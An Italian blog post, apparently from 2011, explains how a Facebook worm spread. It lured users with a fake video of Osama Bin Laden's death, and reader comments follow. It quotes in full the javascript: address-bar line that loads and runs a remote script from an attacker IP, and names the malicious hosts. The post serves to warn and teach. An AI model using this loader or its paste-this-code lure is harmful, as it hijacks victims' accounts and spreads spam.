Osama Bin Laden ora è un virus su Facebook

Da ieri sera la curiosità morbosa e le perplessità diffuse sulla morte di Osama Bin Laden sono diventate un virus, anche se tecnicamente si può definire in molti altri modi, che impazza su Facebook e frega centinaia di migliaia di incauti navigatori.

 

Come funziona? Si riceve sulla bacheca, o via chat o via messaggio privato, la segnalazione da parte di un amico che invita a visitare una pagina Facebook trappola, dove si dovrebbe poter vedere il video segreto della morte del leader di AlQaeda. Il link di solito è accompagnato da un breve messaggio generico come “questo è davvero scioccante..”. Inutile dire che la quasi totalità dei detentori di un profilo non esita un solo secondo e clicca compulsivamente sul link, per atterrare su una pagina pubblica dove si aspetta di trovare il famigerato video: la pagina trappola, per l’appunto.

 

Fin qui tutto bene? Non proprio. Già la semplice pressione del link conduce attraverso una serie interminabile di redirect dietro le quinte, ovvero di rimbalzi tra server e pagine diverse, che ogni volta caricano contenuti e script potenzialmente malevoli nel computer dello sprovveduto curiosone (curiosity killed the cat, ah…se ogni tanto ce lo ricordassimo!). Ecco una stampata ottenuta con uno sniffer http (cliccare sull’immagine per una vederne una versione più nitida).

 

 

 Come si può vedere dalla lista dello scambio http, vengono caricati contenuti remoti non appartenenti al dominio di Facebook. Per esempio la maschera finale presente sulla pagina pubblica di destinazione è residente su http://www.brievela.info/0sama/, e non è escluso che durante questi rimbalzi possano salire a bordo script malevoli. Per esempio, questo che fa di preciso: http://cdn.tynt.com/tc.js (appositamente non cliccabile)? Andrebbe deoffuscato. Solo alla fine di un lungo ping-pong si atterra finalmente sulla pagina pubblica cosiddetta trappola, che ha l’unico scopo di diffondere la procedura a tutta la lista dei propri amici Facebook. La pagina non mostra infatti alcun video, nè una tradizionale bacheca con messaggi, ma un modulo con una serie di istruzioni (quello caricato da www.brievela.info/Osama), criptiche per i più, che una volta eseguite passo passo – si assicura – permetteranno di vedere il video tanto agognato.

 
 
 

L’aspetto della pagina trappola di per se stesso dovrebbe bastare a dissuadere anche gli individui meno sospettosi per natura (ignari che il solo fatto di esservi approdati abbia comportato una navigazione intermedia così tempestosa e foriera di un destino poco fortunato). Invece no: il fascino dell’hacker fai-da-te, destato dall’emozione di immettere codici informatici di cui non si capisce assolutamente nulla, è una tentazione troppo forte. Così l’incauto internauta esegue le istruzioni, ed è lì che i fantasiosi progettisti del software malevolo possono cantare vittoria, perché inizia finalmente la fase finale, quella della riproduzione sessuale del virus sociale.

E’ difficile spiegare a chi non è del mestiere cosa fanno quelle righe di codice che, con un po’ di leggerezza, si eseguono spontaneamente, rapiti dai fumi dell’ossessione morbosa, ma proverò a farlo con parole semplici, perché il meccanismo sia chiaro a chi informatico non è – e del resto, se lo fosse, non ci sarebbe cascato.

Il programma con il quale navigate in internet, detto browser (per esempio Internet Explorer, Firefox, Chrome, Opera, Safari e via dicendo sono tutti browser, cioè “navigatori”), è capace non solo di leggere il contenuto informativo di una pagina, ovvero il layout e il testo, ma anche di eseguire istruzioni scritte in linguaggi di programmazione alquanto limitati ma sufficienti a fare la maggior parte delle cose necessarie per la navigazione online. Questi linguaggi sono i cosiddetti “linguaggi di scripting“, e il codice che eseguono si chiama “script“. Uno dei linguaggi di scripting più usati si chiama “javascript“. Se digitate javascript:alert(‘Bravo: hai vinto un premio!’); nella barra dove inserite gli indirizzi internet, in molti casi potrete rendervi conto da soli di quello che accade.

Cosa vi viene chiesto di inserire nella barra degli indirizzi? Questo:

javascript: (a=(b=document).createElement(‘script’)).src = ‘//109.230.246.175/strummer.php?’ + Math.random(),b.body.appendChild(a);void(0)

Il codice crea banalmente un nuovo script, carica il contenuto (le effettive linee di codice, cioè il programma da eseguire) da un server remoto (//109.230.246.175/strummer.php), si assicura che il browser lo ricarichi ogni volta che si tenta di eseguire nuovamente l’operazione, aggiungendo un codice matematico casuale in coda alla richiesta ( Math.random() genera numeri casuali tra 0 e 1), sostanzialmente al fine di ingannare il meccanismo di caching del browser fingendo che l’indirizzo sia ogni volta diverso, mentre a cambiare è solo un singolo parametro inutilizzato, e infine aggiunge dinamicamente, al volo, lo script così caricato al corpo del documento della pagina internet sulla quale vi trovate. In buona sostanza, è come se lo script facesse parte effettivamente di quelli che, nel caso di specie, la pagina originaria di Facebook mette a disposizione.

A quel punto il codice (lo script) caricato da remoto viene eseguito automaticamente. Per chi ci volesse guardare dentro, lo allego in un file di testo con estensione txt (e quindi innocuo, non eseguibile) e scaricabile da qui.

Cosa fa di preciso? Difficile dirlo con esattezza senza rompersi il capo riga per riga, cercando di riportare ordine nella formattazione caotica dello script, e io non ne ho voglia. Ma ad uno sguardo generico mi pare si possa affermare che non faccia nulla di grave (dove per grave intendo trafficare tra i vostri dati sul computer e trasferire codici di carte di credito, password bancarie, installare malware etc, e del resto per quello il rischio maggiore, se c’è stato, l’abbiamo corso cliccando inizialmente sul primo link), se non iniziare ad interagire con il motore di scripting di Facebook, ovvero quella libreria inclusa nelle pagine del social network proprio al fine di permettere un’interazione programmabile con tutte le complesse funzionalità del sito, e dare inizio ad un trasferimento di massa verso tutti i vostri contatti. Non prima di avere però effettuato una chiamata a una misteriosa pagina, ottenuta attraverso l’uso programmatico dei servizi di “url shortening” (i siti che abbreviano gli indirizzi lunghi e li fanno piccini piccini): http://www.mytimecount.info/red.php, che al momento in cui scrivo risulta indisponibile ma che proprio grazie al meccanismo del redirect offerto dall’url shortener avrà già cambiato dinamicamente il suo indirizzo e si sarà trasferita agilmente altrove. Tale pagina dovrebbe essere sostanzialmente, seppure migrata rispetto alla volta precedente, la prima visitata dal vostro amico del cuore che state per fregare, quella che dopo avere iniettato il browser di codici affatto benevoli redirezionerà l’utente verso l’indirizzo di una pagina trappola nuova, creata ad hoc a mano a mano che quelle vecchie vengono di volta in volta disattivate dal sistema di protezione di Facebook.

Inizialmente, in maniera abbastanza furba, lo script vi invita ad attendere, mostrando il seguente messaggio a schermo: “Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!“. Lo scopo è quello ovvio di permettere allo script di completare i suoi traffici, che in dipendenza dal numero di amici che avete possono richiedere anche diversi minuti, scongiurando il rischio che vi stufiate e abbandoniate la pagina, interrompendo implicitamente ogni attività. Nel frattempo inizia a diffondersi a tutti i vostri contatti sulla chat, con il seguente testo: “Guarda il video dell’esecuzione di osama bin laden :“, seguito da un indirizzo sempre diverso in maniera da inficiare il meccanismo di segnalazione di Facebook. La seconda mossa è quella di postare il link alle pagine facebook trappola sulle bacheche di tutti i vostri amici, attirandoli sostanzialmente con un paio di messaggi di testo: “questo è davvero scioccante..” e “guarda cosa fanno questi soldati ad Osama! ” e con un’immagine di Osama Bin Laden che viene recuperata da qui: http:// i54.tinypic.com / k0r1xh.jpg. Poi, e questo spiega l’alto numero di fan di queste pagine pubbliche, attiva l’evento “MI PIACE” della pagina al posto vostro, iscrivendovi di fatto tra i fan della pagina a vostra insaputa. In questo modo riesce a fare in poche ore decine di migliaia di fan su una singola pagina trappola. Le pagine trappole sembrano essere molte, e probabilmente vengono create di continuo programmaticamente mentre le vecchie vengono disattivate, ma funzionano tutte in modo sostanzialmente simile.

Un giochetto molto pericoloso insomma, la cui parte minacciosa non consiste in quella terminale, come si potrebbe pensare, che serve solo a replicare il modello, ma si compie con il primo click. Oltre a destare seria preoccupazione per il futuro della propria sicurezza digitale, la diffusione del virus sociale costa moltissimo in termini di tempo perso dalla comunità a cancellare dalle bacheche i link che compaiono come i funghi, costa ancor di più in termini di spreco di risorse hardware e software dei server di Facebook, impegnati a soddisfare richieste illegittime che si susseguono a centinaia di migliaia, il che si traduce in probabili rallentamenti del sistema, costa altresì in termini di risorse umane – il personale di Facebook plausibilmente impiegato per arginare il fenomeno – e ovviamente costa all’incauto utente una bella caduta di stile per essersi fatto cogliere in fallo, vittima di una trappola che lo qualifica come un’internauta sprovveduto di fronte a tutti i suoi amici che ricevono i suoi inoltri automatici. Semprechè i suoi amici non siano ancora più ingenui di lui.

Se siete tra coloro che si sono fatti cogliere impreparati, magari perché sovrappensiero, e hanno anche semplicemente cliccato sul primo collegamento che invitava a vedere il video dell’uccisione di Osama, evitate qualsiasi tipo di navigazione che comporti l’invio di dati sensibili e lanciate immediatamente una scansione globale con il vostro antivirus / antimalware / antirootkit e antisfiga di fiducia. Non farlo potrebbe avere effetti imprevisti e possibilmente spiacevoli.

Diffidare, gente, diffidare degli inviti troppo sberluccicanti per essere realistici, e soprattutto dei giochetti inusuali, che dopo un meccanismo di certosino taglia e incolla vi promettono l’accesso a documenti super-segreti. Si tratta sempre al 100% di bufale. E possono costare care.

 

12 commenti

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

  • io sono una delle boccalone che ha a perto il link..mi era parso strano, ma tant’è..cmq cosa devo fare? cosa devo aspettarmi? posso usare il mio pc con tranquillità anche per fare acquisti o controllare conti correnti oppure no? fatemi sapere, in materia sono completamente ignorante!!!

  • io ho cliccato sul link,ma mi ha reindirizzato alla home di facebook,premetto che stavo con ubuntu.Mi dovrei preoccupare??

  • Gentile Byoblu,

    io ci sono finito sulla pagina da un articolo – non ci crederai – su corriere.it, che contiene il link. Poi ho chiuso tutto, mi sono disconnesso e ho fatto una scansione completa e profonda con avast. Non è stato trovato nulla… devo stare tranquillo o sono ancora in pericolo?

    Grazie mille

  • Anche io ci sono cascata!!! C’ho cliccatosopra e ho eseguito tutte le istruzioni D:

    E adesso non riesco più a condividere i link su Facebook D:

     

  • Io sono stato spinto dalla tentazione a cliccare sul 1° link ora che ho letto questo testo di Byoblu…. comunque ho come antivirus GData IS 2011 in massima protezione su Win7 64bit… non mi ha notificato niente…. anche se dovrei vedere qualche comportamento strano rimetto la copia di sicurezza immagine con Acronis True Image…. GData lo danno per il migliore perchè è l’unico ad avere doppio motore di scansione… ecco la fonte: http://www.av-comparatives.org/images/stories/test/ondret/avc_od_feb2011.pdf

  • Grazie Claudio, per la segnalazione e per la spiegazione a chi se ne intende meno di te…

    Ti vorrei fare una domanda: questo passaggio

    QUOTE

    Inizialmente, in maniera abbastanza furba, lo script vi invita ad attendere, mostrando il seguente messaggio a schermo: “Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!“. Lo scopo è quello ovvio di permettere allo script di completare i suoi traffici…

    UNQUOTE

    si verifica anche sui siti di hosting (tipo Megaupload) fanno aspettare TOT secondi prima di iniziare il download?

     

    Ciao e buona guarigione…

     

    Luca

Top

Questo sito utilizza i cookie per migliorare servizi ed esperienza del lettore. Se decidi di continuare la navigazione consideriamo accettato l'utilizzo dei cookie. Leggi tutto ...

Questo sito utilizza i cookie per fornire la migliore esperienza di navigazione possibile. Continuando a utilizzare questo sito senza modificare le impostazioni dei cookie o cliccando su "Accetta" permetti il loro utilizzo.

Chiudi